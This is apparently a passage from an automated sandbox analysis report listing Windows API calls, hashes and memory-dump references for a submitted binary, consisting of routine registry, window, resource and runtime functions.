                                                                  • Instruction ID: 4a004d8378c510f9302bfa1c4322c4e0a5c30b012a0eea9461685c68daffc84b
                                                                  • Opcode Fuzzy Hash: 91c233afbab342a3475de1643787a91e09f28b41c74434183681af6c356f277e
                                                                  • Instruction Fuzzy Hash: 8A110E31450782ABC7218B288CDDF3FB6A9EB80B68F240188F545962E2CFB8CC60C610
                                                                  APIs
                                                                  • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 001D43D9
                                                                  • RegDeleteValueW.ADVAPI32(00000000,?), ref: 001D43F8
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 001D4425
                                                                    • Part of subcall function 001D41A4: RegCloseKey.ADVAPI32(?), ref: 001D4249
                                                                    • Part of subcall function 001D41A4: RegCloseKey.ADVAPI32(?), ref: 001D4253
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001D4440
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Delete$PrivateProfileStringValueWrite
                                                                  • String ID:
                                                                  • API String ID: 1330817964-0
                                                                  • Opcode ID: 11a79936dea95babbef8644fbf800bfd805725f106a5e968850a142e1860e3ef
                                                                  • Instruction ID: 706552cd0452d87b23a140286fc76d4c05a4e1e1ca23d200b296bf2937907a71
                                                                  • Opcode Fuzzy Hash: 11a79936dea95babbef8644fbf800bfd805725f106a5e968850a142e1860e3ef
                                                                  • Instruction Fuzzy Hash: 62117333400165FFCF216FA4ECC8DAE3B6AFF483657058436F6595A121C7728961DB61
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 001D0FD8
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 001D0FE9
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 001D0FF9
                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 001D101B
                                                                  • PtInRect.USER32(00000000,00000000,00000000), ref: 001D102B
                                                                  • GetWindow.USER32(?,00000005), ref: 001D1038
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: 5419d924175e8ca43f51d42d1a803e63dd9ca7e3fa100f959212955f674024e9
                                                                  • Instruction ID: b8407c3b0188dae91d62a5ad388c518bdb7a1e0faab99e2dd93d7f81733bd6c3
                                                                  • Opcode Fuzzy Hash: 5419d924175e8ca43f51d42d1a803e63dd9ca7e3fa100f959212955f674024e9
                                                                  • Instruction Fuzzy Hash: E311AC36940159BBDB11AF94DC48BEEB3B8EF15362F214016F905A6190CB34AE418BA1
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 001D111C
                                                                  • GetParent.USER32(00000000), ref: 001D1144
                                                                    • Part of subcall function 001D0F09: GetWindowLongW.USER32(?,000000F0), ref: 001D0F2A
                                                                    • Part of subcall function 001D0F09: GetClassNameW.USER32(?,?,0000000A), ref: 001D0F3F
                                                                    • Part of subcall function 001D0F09: CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 001D0F59
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 001D115F
                                                                  • GetParent.USER32(?), ref: 001D116D
                                                                  • GetDesktopWindow.USER32 ref: 001D1171
                                                                  • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 001D1185
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                                  • String ID:
                                                                  • API String ID: 1233893325-0
                                                                  • Opcode ID: fd7aec7d7d62c7bcec58affd43f8270f540287db5ef0c029059650c922ae762b
                                                                  • Instruction ID: bd8eef434ac675661634ac3143e8e7e9c8be8ad15817c4a4a0153494d4527741
                                                                  • Opcode Fuzzy Hash: fd7aec7d7d62c7bcec58affd43f8270f540287db5ef0c029059650c922ae762b
                                                                  • Instruction Fuzzy Hash: 2601863224435177D72127766CC9F6A756D9B89B50F294527FB08A7380DF64DC018164
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 002C53E6
                                                                    • Part of subcall function 002C5DC1: __getptd_noexit.LIBCMT ref: 002C5DC4
                                                                    • Part of subcall function 002C5DC1: __amsg_exit.LIBCMT ref: 002C5DD1
                                                                  • __amsg_exit.LIBCMT ref: 002C5406
                                                                  • __lock.LIBCMT ref: 002C5416
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 002C5433
                                                                  • _free.LIBCMT ref: 002C5446
                                                                  • InterlockedIncrement.KERNEL32(02B72CE0), ref: 002C545E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3470314060-0
                                                                  • Opcode ID: c73d159461429f4b5d867d8c0e4278131b62f0a5339d5d50d4eb305e22bb516a
                                                                  • Instruction ID: 9869528f91b77cc5be58b031d45e6bf3fd3c05e9062e05c77d0b6f9d4b1ad04b
                                                                  • Opcode Fuzzy Hash: c73d159461429f4b5d867d8c0e4278131b62f0a5339d5d50d4eb305e22bb516a
                                                                  • Instruction Fuzzy Hash: EA01C832961A3297CB35AF549845F9E77A06F00751F084219E8046B291CB34F9E1CFE1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: @$@$AfxFrameOrView100su$AfxMDIFrame100su
                                                                  • API String ID: 2102423945-2639805938
                                                                  • Opcode ID: 6eff4c09966c29477085905c5132b50a6fe86f79f2557c7dcd913b0864d861df
                                                                  • Instruction ID: 4f3940b96fd4e19e7f470a724f42a6ff8eca7031a0ae434ec7cb98bda2d63fab
                                                                  • Opcode Fuzzy Hash: 6eff4c09966c29477085905c5132b50a6fe86f79f2557c7dcd913b0864d861df
                                                                  • Instruction Fuzzy Hash: 97912372C00219AADB50DFE8D585BDEBBF8AF44344F108566F908E7281EB749B45DBE0
                                                                  APIs
                                                                  • SetupFindFirstLineW.SETUPAPI(?,?,00000000,0000002C,00312A58,6B722804,00312A58,00000000), ref: 001C2315
                                                                  • SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 001C23B0
                                                                  • SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 001C244A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FindLineSetup$Next$First
                                                                  • String ID: VID_0525$VID_1782
                                                                  • API String ID: 1432318419-2521349241
                                                                  • Opcode ID: d7b06763e537fd83f4b41b2d194c4afb13f90ae6e553f53edc4e6328070bdc7e
                                                                  • Instruction ID: 26baea7234dd58a1f035cf2f8e86a65796151849df6e60e37f7bb970593ee1b5
                                                                  • Opcode Fuzzy Hash: d7b06763e537fd83f4b41b2d194c4afb13f90ae6e553f53edc4e6328070bdc7e
                                                                  • Instruction Fuzzy Hash: 38815971A006469FCB18CFA8CC91FAEB3A5FB69324B24876DE425D72D1DB35E901CB50
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRectVisibleWindow
                                                                  • String ID: D2$2$2
                                                                  • API String ID: 3084472430-1793331178
                                                                  • Opcode ID: 5d3b473982ff1ac96c0ebbdc4b1bfc575f03b3eeebe289660d34516583bdc36c
                                                                  • Instruction ID: 654512841f6e433160ebd2c6a2f508fa2e613456f72e43bb47740f29d9ca46d6
                                                                  • Opcode Fuzzy Hash: 5d3b473982ff1ac96c0ebbdc4b1bfc575f03b3eeebe289660d34516583bdc36c
                                                                  • Instruction Fuzzy Hash: 23715B30A102099FDB15EFA5C889BBEB7F9AF49304F1500B9EA45EB291DB719C41CF91
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,00000000,000000F1), ref: 001EDBE2
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 001EDBF5
                                                                  • LockResource.KERNEL32(00000000), ref: 001EDC03
                                                                  • FreeResource.KERNEL32(?), ref: 001EDDA7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$Exception@8FindFreeH_prolog3LoadLockThrow
                                                                  • String ID: DR/
                                                                  • API String ID: 1564530344-2878275201
                                                                  • Opcode ID: 609b4e7f8f5ca9edb4430b604bd1a3d3c72c038cfd7740185a40e5a2082a4c84
                                                                  • Instruction ID: e6b0b01e11e95b85558173f6d6bb210908c59b5edbcb81afee0d6e3bd8c46cc4
                                                                  • Opcode Fuzzy Hash: 609b4e7f8f5ca9edb4430b604bd1a3d3c72c038cfd7740185a40e5a2082a4c84
                                                                  • Instruction Fuzzy Hash: 7261C474A00A46EFCB159FA6D985BBEB7B4FF04344F20846DF84697291EB70D950CB50
                                                                  APIs
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 001E3AC2
                                                                  • WindowFromPoint.USER32(?,?), ref: 001E3B02
                                                                  • SendMessageW.USER32(?,00000000,?,00000000), ref: 001E3B75
                                                                  • ScreenToClient.USER32(?,?), ref: 001E3BD6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncClientFromMessagePointScreenSendStateWindow
                                                                  • String ID: 83/
                                                                  • API String ID: 227561881-2323854675
                                                                  • Opcode ID: 57c4d25206b96522d4fdcd52a9bd11ba916b09745e467eea8008ddf49039726d
                                                                  • Instruction ID: 40dac6b2ca2b6835ff867fc9eaa83713e08271057b4700001316608925c98d8a
                                                                  • Opcode Fuzzy Hash: 57c4d25206b96522d4fdcd52a9bd11ba916b09745e467eea8008ddf49039726d
                                                                  • Instruction Fuzzy Hash: B3519171600A56AFCF18DF65C889ABEB7B5FB44700F20456BF96A97250DB30DA50CF90
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,6B722804,?,?,?,?,002DADE0,000000FF), ref: 001D4714
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,002DADE0,000000FF), ref: 001D4750
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,002DADE0,000000FF), ref: 001D476B
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 001D47D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$ClosePrivateProfileString
                                                                  • String ID: X*1
                                                                  • API String ID: 1042844925-2740677128
                                                                  • Opcode ID: 75fd2ef4651b015c7e22ff1996a2d7697be172a46b9dbcb79c32c97c0ee94ec6
                                                                  • Instruction ID: 72dec97ae5dd3e67aeb8130482767eb89460a95da6e657d0c830160eadbe0715
                                                                  • Opcode Fuzzy Hash: 75fd2ef4651b015c7e22ff1996a2d7697be172a46b9dbcb79c32c97c0ee94ec6
                                                                  • Instruction Fuzzy Hash: E6413C71D00328DBCB269F14CC88E9EB7B9EF59710F10459BF519A2292CB309E95DFA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLock_wcslenlstrlen
                                                                  • String ID: Fy)
                                                                  • API String ID: 2647411976-924414643
                                                                  • Opcode ID: 16986aaca8e3d7e7582d33b1448db2b8606b1ced6c7be357529156ac1cc19aad
                                                                  • Instruction ID: d5c95e20cee69fd2de13dfb33ae16e60c1c990e41ee87cee1502d0b4f0071eac
                                                                  • Opcode Fuzzy Hash: 16986aaca8e3d7e7582d33b1448db2b8606b1ced6c7be357529156ac1cc19aad
                                                                  • Instruction Fuzzy Hash: DE41E771910116EFCB18DF68C8856AEF7B5FF05304F10896AE81697141DB749E59CBA0
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C746A
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
                                                                    • Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
                                                                    • Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C74A7
                                                                    • Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D8556
                                                                    • Part of subcall function 002D8541: __CxxThrowException@8.LIBCMT ref: 002D856B
                                                                    • Part of subcall function 002D8541: std::exception::exception.LIBCMT ref: 002D857C
                                                                  • _memmove.LIBCMT ref: 001C7508
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                  • String ID: invalid string position$string too long
                                                                  • API String ID: 1615890066-4289949731
                                                                  • Opcode ID: e8137e6133b25084c1504456ae9526e14d5f7005e6256e13421ec09d1ef28e5c
                                                                  • Instruction ID: 6c9cfee7dc6be073e9c2948527649aee7f0291ad6d169b8df88867cfb320079b
                                                                  • Opcode Fuzzy Hash: e8137e6133b25084c1504456ae9526e14d5f7005e6256e13421ec09d1ef28e5c
                                                                  • Instruction Fuzzy Hash: 8531A7323082149BD7259E5CE890F6EF7A9EBB0765B24052FF145CB2C1DBB1DC508BA5
                                                                  APIs
                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 001CC89E
                                                                  • _memset.LIBCMT ref: 001CC916
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 001CC978
                                                                  • LoadBitmapW.USER32(00000000,00007FE3), ref: 001CC990
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                  • String ID:
                                                                  • API String ID: 4271682439-3916222277
                                                                  • Opcode ID: 88ac2b5d6b920c9fc769a132cf016b157fae166015c468d86e14ac809e2ad794
                                                                  • Instruction ID: de21675b395454bf134883738e43de5ee2ed3dfe5fd900614596caeb36fff60a
                                                                  • Opcode Fuzzy Hash: 88ac2b5d6b920c9fc769a132cf016b157fae166015c468d86e14ac809e2ad794
                                                                  • Instruction Fuzzy Hash: 3E31E372A002599BEB208F689CC5BA97BB8EB55314F5540AAE58DEB181DF30CD849F90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect$CursorState
                                                                  • String ID: 2
                                                                  • API String ID: 2369637639-3001879987
                                                                  • Opcode ID: 3ea0ffeeb553cd84685a5cfbea0994317f1a9c3c346b3c2d5df92ab2eccae8ee
                                                                  • Instruction ID: c3191423cf2550ca5642de5a8e359724731edb37569141b5480ddee30991799b
                                                                  • Opcode Fuzzy Hash: 3ea0ffeeb553cd84685a5cfbea0994317f1a9c3c346b3c2d5df92ab2eccae8ee
                                                                  • Instruction Fuzzy Hash: B6212971E1021DAFCB11DFA5DC859FEFBBDFB48B40B20042AF206E6100DB749A418BA1
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 00212391
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002123CC
                                                                  • OffsetRect.USER32(?,?,?), ref: 002123DC
